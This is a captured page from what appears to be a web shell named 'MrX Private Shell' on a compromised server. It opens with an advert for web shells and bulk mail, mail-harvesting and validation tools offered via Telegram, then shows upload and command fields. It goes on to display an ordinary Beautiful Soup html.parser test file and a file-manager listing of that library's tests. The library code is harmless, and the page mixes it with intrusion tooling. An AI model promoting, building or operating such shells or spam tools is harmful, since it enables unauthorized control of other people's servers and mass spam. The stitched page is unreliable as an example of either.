__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
"""Tests to ensure that the html.parser tree builder generates good
trees."""

import pickle
import pytest
from bs4.builder._htmlparser import (
    _DuplicateAttributeHandler,
    BeautifulSoupHTMLParser,
    HTMLParserTreeBuilder,
)
from bs4.exceptions import ParserRejectedMarkup
from typing import Any
from . import HTMLTreeBuilderSmokeTest


class TestHTMLParserTreeBuilder(HTMLTreeBuilderSmokeTest):
    default_builder = HTMLParserTreeBuilder

    def test_rejected_input(self):
        # Python's html.parser will occasionally reject markup,
        # especially when there is a problem with the initial DOCTYPE
        # declaration. Different versions of Python sound the alarm in
        # different ways, but Beautiful Soup consistently raises
        # errors as ParserRejectedMarkup exceptions.
        bad_markup = [
            # https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=28873
            # https://github.com/guidovranken/python-library-fuzzers/blob/master/corp-html/519e5b4269a01185a0d5e76295251921da2f0700
            # https://github.com/python/cpython/issues/81928
            b"\n<![\xff\xfe\xfe\xcd\x00",
            # https://github.com/guidovranken/python-library-fuzzers/blob/master/corp-html/de32aa55785be29bbc72a1a8e06b00611fb3d9f8
            # https://github.com/python/cpython/issues/78661
            #
            b"<![n\x00",
            b"<![UNKNOWN[]]>",
        ]
        for markup in bad_markup:
            with pytest.raises(ParserRejectedMarkup):
                self.soup(markup)

    def test_namespaced_system_doctype(self):
        # html.parser can't handle namespaced doctypes, so skip this one.
        pass

    def test_namespaced_public_doctype(self):
        # html.parser can't handle namespaced doctypes, so skip this one.
        pass

    def test_builder_is_pickled(self):
        """Unlike most tree builders, HTMLParserTreeBuilder and will
        be restored after pickling.
        """
        tree = self.soup("<a><b>foo</a>")
        dumped = pickle.dumps(tree, 2)
        loaded = pickle.loads(dumped)
        assert isinstance(loaded.builder, type(tree.builder))

    def test_redundant_empty_element_closing_tags(self):
        self.assert_soup("<br></br><br></br><br></br>", "<br/><br/><br/>")
        self.assert_soup("</br></br></br>", "")

    def test_empty_element(self):
        # This verifies that any buffered data present when the parser
        # finishes working is handled.
        self.assert_soup("foo &# bar", "foo &amp;# bar")

    def test_tracking_line_numbers(self):
        # The html.parser TreeBuilder keeps track of line number and
        # position of each element.
        markup = "\n   <p>\n\n<sourceline>\n<b>text</b></sourceline><sourcepos></p>"
        soup = self.soup(markup)
        assert 2 == soup.p.sourceline
        assert 3 == soup.p.sourcepos
        assert "sourceline" == soup.p.find("sourceline").name

        # You can deactivate this behavior.
        soup = self.soup(markup, store_line_numbers=False)
        assert None is soup.p.sourceline
        assert None is soup.p.sourcepos

    def test_on_duplicate_attribute(self):
        # The html.parser tree builder has a variety of ways of
        # handling a tag that contains the same attribute multiple times.

        markup = '<a class="cls" href="url1" href="url2" href="url3" id="id">'

        # If you don't provide any particular value for
        # on_duplicate_attribute, later values replace earlier values.
        soup = self.soup(markup)
        assert "url3" == soup.a["href"]
        assert ["cls"] == soup.a["class"]
        assert "id" == soup.a["id"]

        # You can also get this behavior explicitly.
        def assert_attribute(
            on_duplicate_attribute: _DuplicateAttributeHandler, expected: Any
        ) -> None:
            soup = self.soup(markup, on_duplicate_attribute=on_duplicate_attribute)
            assert soup.a is not None
            assert expected == soup.a["href"]

            # Verify that non-duplicate attributes are treated normally.
            assert ["cls"] == soup.a["class"]
            assert "id" == soup.a["id"]

        assert_attribute(None, "url3")
        assert_attribute(BeautifulSoupHTMLParser.REPLACE, "url3")

        # You can ignore subsequent values in favor of the first.
        assert_attribute(BeautifulSoupHTMLParser.IGNORE, "url1")

        # And you can pass in a callable that does whatever you want.
        def accumulate(attrs, key, value):
            if not isinstance(attrs[key], list):
                attrs[key] = [attrs[key]]
            attrs[key].append(value)

        assert_attribute(accumulate, ["url1", "url2", "url3"])

    def test_html5_attributes(self):
        # The html.parser TreeBuilder can convert any entity named in
        # the HTML5 spec to a sequence of Unicode characters, and
        # convert those Unicode characters to a (potentially
        # different) named entity on the way out.
        for input_element, output_unicode, output_element in (
            ("&RightArrowLeftArrow;", "\u21c4", b"&rlarr;"),
            ("&models;", "\u22a7", b"&models;"),
            ("&Nfr;", "\U0001d511", b"&Nfr;"),
            ("&ngeqq;", "\u2267\u0338", b"&ngeqq;"),
            ("&not;", "\xac", b"&not;"),
            ("&Not;", "\u2aec", b"&Not;"),
            ("&quot;", '"', b'"'),
            ("&there4;", "\u2234", b"&there4;"),
            ("&Therefore;", "\u2234", b"&there4;"),
            ("&therefore;", "\u2234", b"&there4;"),
            ("&fjlig;", "fj", b"fj"),
            ("&sqcup;", "\u2294", b"&sqcup;"),
            ("&sqcups;", "\u2294\ufe00", b"&sqcups;"),
            ("&apos;", "'", b"'"),
            ("&verbar;", "|", b"|"),
        ):
            markup = "<div>%s</div>" % input_element
            div = self.soup(markup).div
            without_element = div.encode()
            expect = b"<div>%s</div>" % output_unicode.encode("utf8")
            assert without_element == expect

            with_element = div.encode(formatter="html")
            expect = b"<div>%s</div>" % output_element
            assert with_element == expect

    def test_invalid_html_entity(self):
        # The html.parser treebuilder can't distinguish between an invalid
        # HTML entity with a semicolon and an invalid HTML entity with no
        # semicolon.
        markup = "<p>a &nosuchentity b</p>"
        soup = self.soup(markup)
        assert "<p>a &amp;nosuchentity b</p>" == soup.p.decode()

        markup = "<p>a &nosuchentity; b</p>"
        soup = self.soup(markup)
        assert "<p>a &amp;nosuchentity b</p>" == soup.p.decode()

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
fuzz Folder 0755
__init__.py File 51.04 KB 0644
test_builder.py File 1.07 KB 0644
test_builder_registry.py File 4.95 KB 0644
test_css.py File 18.19 KB 0644
test_dammit.py File 17.42 KB 0644
test_element.py File 4.27 KB 0644
test_filter.py File 26.4 KB 0644
test_formatter.py File 6.78 KB 0644
test_fuzz.py File 6.96 KB 0644
test_html5lib.py File 8.99 KB 0644
test_htmlparser.py File 6.51 KB 0644
test_lxml.py File 7.28 KB 0644
test_navigablestring.py File 4.98 KB 0644
test_pageelement.py File 15.82 KB 0644
test_soup.py File 22.14 KB 0644
test_tag.py File 9.46 KB 0644
test_tree.py File 53.55 KB 0644
Filemanager